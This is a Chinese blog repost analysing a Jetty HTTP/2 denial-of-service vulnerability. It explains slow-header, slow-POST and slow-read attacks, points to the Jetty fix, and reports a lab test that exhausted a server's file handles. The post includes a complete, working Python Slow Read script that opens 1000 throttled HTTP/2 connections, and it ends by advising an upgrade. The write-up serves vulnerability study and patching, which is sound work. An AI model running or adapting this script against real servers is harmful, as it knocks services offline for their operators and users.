Jetty HTTP2.0 DoS漏洞分析

最新推荐文章于 2024-03-13 07:30:00 发布
最新推荐文章于 2024-03-13 07:30:00 发布
阅读量1.8k 收藏 2
点赞数
文章标签: jetty
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/BASK2311/article/details/130740845
版权

背景

Tomcat和Jetty都是被广泛用于项目的开源Servlet容器。本文不会阐述Tomcat和Jetty之间的区别,感兴趣的同学可以自行学习相关内容。

Jetty团队去年在github issues中爆出了一个可能被DoS攻击的中级漏洞。github.com/eclipse/jet…

大致是,在Jetty容器引用http2-server组件开启HTTP2.0功能后,同时开发者提供了使用HTTP2.0协议服务接口。访问非正常URL时,攻击者可以通过耗尽TCP滑动窗口或HTTP2.0流控来达到耗尽Jetty服务器资源,从而达到DoS攻击效果。噢吼,这不就是HTTP慢速攻击吗。下面我们先来介绍一下HTTP慢速攻击,再来分析Jetty有漏洞的源码,之后我们做个实验来验证一下这个漏洞。

HTTP慢速攻击

HTTP慢速攻击是应用层DoS攻击的一种。由Web安全专家RSnake在2009年提出的一种攻击方式,其原理是以极低速度向服务器发送HTTP请求,服务器有并发数限制。一旦这些恶意链接不释放,同时不停的创建新的恶意链接就会导致服务器资源被耗尽。

HTTP慢速攻击一共有3种

Slow Header攻击

Slow Header攻击利用HTTP 请求头设计。众所周知HTTP Header是文本信息。每个属性,比如Content-Type: text/plain都是由"\r\n"来进行分隔的。最后一个属性后面会拼接"\r\n\r\n"来告知服务器请求头已传输完毕,请处理我的请求。攻击者利用这个设计,永远不传"\r\n\r\n",同时,我们也知道HTTP服务器在没有接收到完整的请求头是不会处理请求的。这时,服务器就不得不一直维持着链接。一旦存在大量这种链接,就会导致服务器资源被耗尽。新的请求无法处理。

Slow POST攻击

攻击者将Content-Length设置为一个很大的值,但是却用非常慢的速度来发送数据。这就会导致服务器一直维护着链接,大量此类型连接就会导致服务器资源耗尽。

Slow Read攻击

利用TCP滑动窗口机制,攻击者将客户端内核读缓冲区设置的非常小。同时,用非常慢的速率将内核读缓冲区的数据拷贝到用户进程缓冲区。这时,服务器端就会收到客户端发来的ZeroWindow消息,让服务器端以为客户端非常忙碌无法处理发来的Response消息。服务器不得不维持着连接。大量此链接的存在就会导致服务器资源消耗殆尽。

漏洞源码

首先贴上Jetty团队修复漏洞的PR链接github.com/eclipse/jet…

这个漏洞存在HttpChannelOverHTTP2.java 的OnRequest和OnPush方法中(OnPush为HTTP2.0特有的服务端推送功能)。我们继续看看OnBadMessage是干什么的。为什么不返回NULL了,而是直接返回一个Runnable对象?

OnBadMessage是在处理请求时出现异常时,向客户端返回错误信息用的。OnBadMessage与OnRequest是在同一个线程上下文。一旦攻击者使用Slow Read来攻击,就会导致jetty的 worker selector线程被阻塞(jetty底层使用的是netty框架)。所以,为了防止阻塞worker线程,jetty团队直接返回一个Runnable对象将它丢到任务队列中,释放线程来处理新的请求。

实验

目前,大多数的HTTP慢速攻击工具,比如基于C++的slowhttptest都不支持HTTP2.0协议。没关系我们可以手搓一个。

注意!!!目前大多数支持HTTP2.0 协议的Servelt容器都要求配置TLS链接。在TLS握手的ALPN(应用协议协商)阶段,客户端和服务器端会达成使用哪种HTTP协议的约定。虽然HTTP2.0协议没有强制要求必须进行TLS握手,但是,使用Jetty HTTP2.0功能必须配置TLS。

攻击脚本

使用Python搓一个Slow Read攻击脚本, 使用h2 HTTP2.0客户端库

在此声明,工具仅提供研究漏洞使用。用于其他目的造成的影响,后果自负,作者概不负责

 

ini
 

复制代码
 

import socket import ssl import time import h2.connection import h2.events from concurrent.futures import ThreadPoolExecutor def attack(ip: str, port: int, url: str): try: # 设置TLS ctx = ssl.create_default_context() ctx.check_hostname = False ctx.verify_mode = ssl.CERT_NONE ctx.set_alpn_protocols(['h2']) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # 将内核读缓冲区设置为128bytes s.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 128) s.settimeout(1200) s = ctx.wrap_socket(s, server_hostname=ip) s.connect((ip, port)) # 设置HTTP2.0 c = h2.connection.H2Connection() c.initiate_connection() s.sendall(c.data_to_send()) except Exception as e: print(e) return # HTTP2.0请求头与HTTP/1稍有不同 headers = [ (':method', 'GET'), (':path', url), (':authority', ip), (':scheme', 'https'), ('keep-alive', 'timeout=5000, max=5000') ] c.send_headers(1, headers, end_stream=True) s.sendall(c.data_to_send()) resp_stream_end = False while not resp_stream_end: # 每次只从内核读缓冲区读取1byte data = s.recv(1) if not data: break events = c.receive_data(data) for event in events: if isinstance(event, h2.events.StreamEnded): resp_stream_end = True break # 每读一个字节,线程休眠15s time.sleep(15) c.close_connection() s.sendall(c.data_to_send()) s.close() if __name__ == '__main__': # 创建1000个发送invalid URL的连接 with ThreadPoolExecutor(max_workers=1000) as pool: for i in range(0, 1000): pool.submit(attack, ip, port, invalid_url) 
 

服务器端
 

服务器端我们使用spring-boot-starter-web,排除Tomcat使用Jetty内嵌式容器。
 

 

xml
 

复制代码
 

<dependencies> <dependency> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-starter-web</artifactId> <version>3.0.4</version> <exclusions> <exclusion> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-starter-tomcat</artifactId> </exclusion> </exclusions> </dependency> <dependency> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-starter-jetty</artifactId> <version>2.6.6</version> </dependency> <dependency> <groupId>org.eclipse.jetty</groupId> <artifactId>jetty-alpn-conscrypt-server</artifactId> <version>9.4.15.v20190215</version> </dependency> <dependency> <groupId>org.eclipse.jetty.http2</groupId> <artifactId>http2-server</artifactId> <version>9.4.15.v20190215</version> </dependency> </dependencies> 
 

配置文件中要开启TLS和http2功能
 

 

yaml
 

复制代码
 

ssl: key-store: classpath:cert.jks key-password: 123456 http2: enabled: true 
 

随意写一个Controller类。
 

可以看到在没有攻击前,请求是正常的,而且协议使用的是h2, 也就是http2.0
 

 

攻击开始
 

通过wireshake抓包可以看到客户端向服务器端发送ZeroWindow 探针。Slow Read 攻击出现
 

 

攻击结束后,服务已经无法访问
 

 

此时通过lsof命令可以看到,jetty在DoS攻击后未能回收连接资源。文件句柄数为548,已经超过512的限制。已经无法再处理新的请求,只能重启服务。DoS攻击成功。
 

 

总结
 

漏洞出现的Jetty版本是9.4.46,理论上小于该版本的Jetty在使用HTTP2.0协议功能的时候都可能会受到DoS攻击。Jetty团队已修复该漏洞。所以,如果使用还在使用低版本Jetty的同学建议升级。
 

 

作者:CrabGeek
 链接:https://juejin.cn/post/7233409321340715067

                

        

        

        

    




    

      

        

            

              
                
                  程序一逸
                
              
            

            

                关注
              
            

        

        

          
    
            
  • 
              
                
                
                
                
                      0
                
              
              
    点赞
    
            
    • 
            
  • 
              
                
                
                
              
              
    
            
    • 
            
  • 
              
                
                
                
                
                    2
                
              
              
    
                
    
                  
                    收藏
                  
                
    
              
    
              
    
                
    
                  觉得还不错?
                  
                    一键收藏
                  
                 
                
    
              
    
            
    • 
          
  • 
            
    
              
              
            
    
              
              
              
                    0
              
            
            
    评论
    
          
    • 
          
  • 
          
    • 
          
  • 
            
              
            
              
    
            
              
                
            
    
          
    • 
        

      

      










                



	

		

			

				
					
漏洞修复整理

				
			

			

				

					BY的博客
				

				

					01-12
					
					1670
					
				

			

		

		

			
				
服务漏洞

			
		

	



                

              
                



	

		

			

				
					
jetty 9.2.24

				
			

			

				

					04-03
				

			

		

		

			
				
jetty服务器,9.2版本适合java7+开发环境。
Jetty是一个纯粹的基于Java的网页服务器和Java Servlet容器。 尽管网页服务器通常用来为人们呈现文档,但是Jetty通常在较大的软件框架中用于计算机与计算机之间的通信。 Jetty作为Eclipse基金会的一部分,是一个自由和开源项目。

			
		

	



                


  
              

                


	

		

			

				
					
web服务器/中间件漏洞系列6:jetty漏洞汇总

				
			

			

				

					W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
				

				

					12-02
					
					1万+
					
				

			

		

		

			
				
JETTY简介:
Jetty作为Eclipse基金会的一部分,是一个纯粹的基于Java的网页服务器和Java Servlet容器,其支持最新的Java Servlet API,同时支持WebSocket,SPDY,HTTP/2协议。
一、CVE-2021-28164 [34429] 敏感信息泄露
1、漏洞简介:
在Jetty9.4.37版本中,为了符合RFC3986中的规范,选择性地支持可能有歧义解释的URI,默认模式允许URL编码,简单看下RFC3986(替代RFC2396)的规定

其大致意思是:.和.

			
		

	





	

		

			

				
					
eclipse jetty插件安装(离线版)

				
			

			

				

					08-01
				

			

		

		

			
				
使用方法:解压缩,直接复制到eclipse安装目录的dropins文件夹下面,重启就可以了。

初次使用时在一个web项目上右键run as——run configuration

			
		

	



		

			
		



	

		

			

				
					
Jettyhttp2模块

					
最新发布

				
			

			

				

					Jackie的家
				

				

					03-13
					
					444
					
				

			

		

		

			
				
Jettyhttp2模块

			
		

	





	

		

			

				
					
XXL-JOB漏洞解决,Eclipse Jetty HTTP请求走私漏洞

				
			

			

				

					悟●禅●酒的专栏
				

				

					05-29
					
					2830
					
				

			

		

		

			
				
可能我使用的xxl-job版本比较老,今天安全组检查,查出来一堆堆,分享下:




			
		

	





	

		

			

				
					
Eclipse Jetty Server 安全漏洞

				
			

			

				

					聆听梦飞扬的博客
				

				

					12-24
					
					5862
					
				

			

		

		

			
				
Eclipse Jetty Server 安全漏洞

			
		

	





	

		

			

				
					
新思科技网络安全研究中心采用Defensics 模糊测试工具发现新漏洞

				
			

			

				

					SIGinChina的博客
				

				

					03-08
					
					1040
					
				

			

		

		

			
				
黑盒模糊测试已经是一种成熟的安全和质量测试技术,使用防御系统发现零日漏洞和未知漏洞,避免演变成昂贵的补丁或召回事件。新思科技的Defensics 是一种全面的、多功能、自动化黑盒模糊测试器,受到开发人员的青睐。近日,新思科技的研究人员采用Defensics® 模糊测试工具发现了Jetty Web服务器拒绝服务漏洞CVE-2020-27223披露在Eclipse Foundation中广泛使用的Jetty Web服务器拒绝服务漏洞Eclipse Foundation是管理和运营Eclipse开源项目的

			
		

	





	

		

			

				
					
Eclipse Jetty server漏洞解决

				
			

			

				

					qq_42222680的博客
				

				

					02-10
					
					6761
					
				

			

		

		

			
				
Eclipse Jetty 服务器伪路径请求绕过漏洞(Linux)

			
		

	





	

		

			

				
					
GeoServer 2.11.1升级解决Eclipse Jetty 的一系列安全漏洞问题

				
			

			

				

					diaya的专栏
				

				

					02-06
					
					1116
					
				

			

		

		

			
				
下载 Geoserver2.32.4,先装了JDK17,再装了GeoServer2.23.4。网址访问一切正常,建了工作空间,在存储仓库里选 shapefile新建时,点“浏览”,竟无法弹出选文件的窗口,查看调用显示下错。接到安全评估报告,发现上面一堆关于Jetty的安全问题,后得知,是GeoServer2.11.1中用的jetty版本太低导致。Eclipse Jetty HTTP请求走私漏洞(CVE-2017-7658)2、先卸载原有的geoserver2.11.1,再卸载其配套的jre 8。

			
		

	





	

		

			

				
					
最新系统漏洞--Eclipse Jetty信息泄露漏洞

				
			

			

				

					weixin_48555088的博客
				

				

					10-22
					
					1万+
					
				

			

		

		

			
				
最新系统漏洞2021年10月22日
受影响系统:
Eclipse Jetty <= 9.4.40
Eclipse Jetty <= 11.0.2
Eclipse Jetty <= 10.0.2
描述:
CVE(CAN) ID: CVE-2021-28169
Eclipse JettyEclipse基金会的一个开源的、基于Java的Web服务器和Java Servlet容器。
Eclipse Jetty 9.4.40及之前版本、10.0.2及之前版本和11.0.2及之前版本存在信息泄露漏洞

			
		

	





	

		

			

				
					
jetty-http-9.3.19.v20170502-API文档-中文版.zip

				
			

			

				

					06-26
				

			

		

		

			
				
赠送jar包:jetty-http-9.3.19.v20170502.jar; 赠送原API文档:jetty-http-9.3.19.v20170502-javadoc.jar; 赠送源代码:jetty-http-9.3.19.v20170502-sources.jar; 赠送Maven依赖信息文件:jetty-...

			
		

	





	

		

			

				
					
jetty-http-9.4.11.v20180605-API文档-中英对照版.zip

				
			

			

				

					06-12
				

			

		

		

			
				
赠送jar包:jetty-http-9.4.11.v20180605.jar; 赠送原API文档:jetty-http-9.4.11.v20180605-javadoc.jar; 赠送源代码:jetty-http-9.4.11.v20180605-sources.jar; 赠送Maven依赖信息文件:jetty-...

			
		

	





	

		

			

				
					
jetty的http服务流程分析

				
			

			

				

					03-07
				

			

		

		

			
				
花了两天整理的jetty的源代码分析的草稿,初学jetty的可以下来看看,懂jetty的就不要看了

			
		

	





	

		

			

				
					
jetty-http-9.4.8.v20171121-API文档-中文版.zip

				
			

			

				

					07-13
				

			

		

		

			
				
赠送jar包:jetty-http-9.4.8.v20171121.jar; 赠送原API文档:jetty-http-9.4.8.v20171121-javadoc.jar; 赠送源代码:jetty-http-9.4.8.v20171121-sources.jar; 赠送Maven依赖信息文件:jetty-...

			
		

	





	

		

			

				
					
一个jetty启动报错问题的排查过程 (Multiple exceptions)

				
			

			

				

					
				

				

					04-21
					
					1万+
					
				

			

		

		

			
				
Multiple exceptions jetty启动服务时错误信息如下:WARN [main] o.e.j.w.WebAppContext [WebAppContext.java:510] Failed startup of context o.e.j.w.WebAppContext@12541cc0{/,file:/E:/webapp/,STARTING}{webapp}
org.eclips...

			
		

	





	

		

			

				
					
(CVE-2021-28164/CVE-2021-34429)Eclipse Jetty WEB-INF敏感信息泄露漏洞分析

				
			

			

				

					weixin_50464560的博客
				

				

					10-04
					
					7967
					
				

			

		

		

			
				
本文主要从Jetty的两个WEB-INF信息泄露漏洞CVE-2021-28164和CVE-2021-34429,来分析如何通过编码和相对路径来绕过对敏感信息的校验,以及Jetty中对URL的PATH的解析方式和存在的问题。
漏洞信息
Jetty作为Eclipse基金会的一部分,是一个纯粹的基于Java的网页服务器和Java Servlet容器,其支持最新的Java Servlet API,同时支持WebSocket,SPDY,HTTP/2协议。
在Jetty9.4.37版本...

			
		

	





	

		

			

				
					
Jetty:配置安全

				
			

			

				

					宁静致远
				

				

					07-10
					
					1万+
					
				

			

		

		

			
				
用${jetty.home}和${jetty.base}配置安全
Jetty 9.1中:
 1)${jetty.home}是jetty发布(二进制)的目录路径;
 2)${jetty.base}是用户定制化的目录路径。
这样分化:
 1)允许你管理多个Jetty安装;
 2)当你升级Jetty后,更容易保留你当前的配置。
更多的信息在后面讲《启动Jetty》时会详述。
而且,Jet

			
		

	





	

		

			

				
					
Jetty 安全漏洞分析

					
热门推荐

				
			

			

				

					xyp632的博客
				

				

					05-22
					
					2万+
					
				

			

		

		

			
				
Jetty 安全漏洞分析1. 安全问题分析2. 升级验证3. Jetty版本不准确问题分析4.	Jetty版本不能准确的临时解决方案5.	应用例子案例 1:metabase案例 2:jenkins

记录日期:2021/5/21

1. 安全问题分析
在做服务器安全扫描时,有时会报出 jetty漏洞。

查看漏洞详情可知,低版本的 jetty 包含漏洞,升级 jetty 到新版本就可以修复这些漏洞漏洞
官方问题连接
修复版本




Eclipse Jetty HTTP请求走私漏洞CVE-

			
		

	





	

		

			

				
					
eclipse jetty 安全漏洞

				
			

			

				

					09-06
				

			

		

		

			
				
根据引用,eclipse jetty存在一个安全漏洞漏洞编号为GHSA-vjv5-gp2w-65vm。具体的漏洞详情可以参考该引用提供的链接。根据引用,在eclipse jetty的commit记录中,可以找到修复该安全漏洞的提交记录,提交记录的链接也可以在引用中找到。此外,根据引用,可以在org.eclipse.jetty.server.handler.ContextHandler.java文件的isProtectedTarget函数中找到涉及该安全漏洞的校验代码。<span class="em">1</span><span class="em">2</span><span class="em">3</span>
#### 引用[.reference_title]
-  *1* *2* *3* [(CVE-2021-28164/CVE-2021-34429)Eclipse Jetty WEB-INF敏感信息泄露漏洞分析](https://blog.csdn.net/weixin_50464560/article/details/120608463)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"]
[ .reference_list ]

			
		

	



              



  
“相关推荐”对你有帮助么?

  

      
    
          
  • 
              
    
                  
                  
              
    
              
    非常没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    一般
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    有帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    非常有帮助
    
          
    • 
      

      

      

          
          提交
      

      

  




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值